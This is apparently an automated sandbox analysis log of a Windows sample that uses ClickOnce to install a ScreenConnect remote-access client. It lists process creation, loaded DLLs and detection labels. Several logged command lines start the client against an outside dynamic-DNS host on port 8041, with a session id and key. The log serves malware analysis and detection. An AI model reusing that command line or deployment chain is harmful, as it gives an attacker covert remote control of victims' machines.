                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848E710CF13_2_00007FF848E710CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848E710D713_2_00007FF848E710D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF84918F27213_2_00007FF84918F272
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF84918296213_2_00007FF849182962
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF84918E46F13_2_00007FF84918E46F
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF84918000B13_2_00007FF84918000B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849186FBD13_2_00007FF849186FBD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849190CBD13_2_00007FF849190CBD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849190CD313_2_00007FF849190CD3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849190E6013_2_00007FF849190E60
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849190D9013_2_00007FF849190D90
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508
                  Source: 3coxOaV92n.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal60.evad.winEXE@20/79@2/2
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00AC1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5508
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCommand line argument: dfshim0_2_00AC1000
                  Source: 3coxOaV92n.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 3coxOaV92n.exeReversingLabs: Detection: 23%
                  Source: unknownProcess created: C:\Users\user\Desktop\3coxOaV92n.exe "C:\Users\user\Desktop\3coxOaV92n.exe"
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "b058094b-2ee9-42ec-a616-548c8b8c83a4" "User"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "a9f9cad7-92f3-4145-a572-df5ab2869f06" "System"
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "b058094b-2ee9-42ec-a616-548c8b8c83a4" "User"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "a9f9cad7-92f3-4145-a572-df5ab2869f06" "System"
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
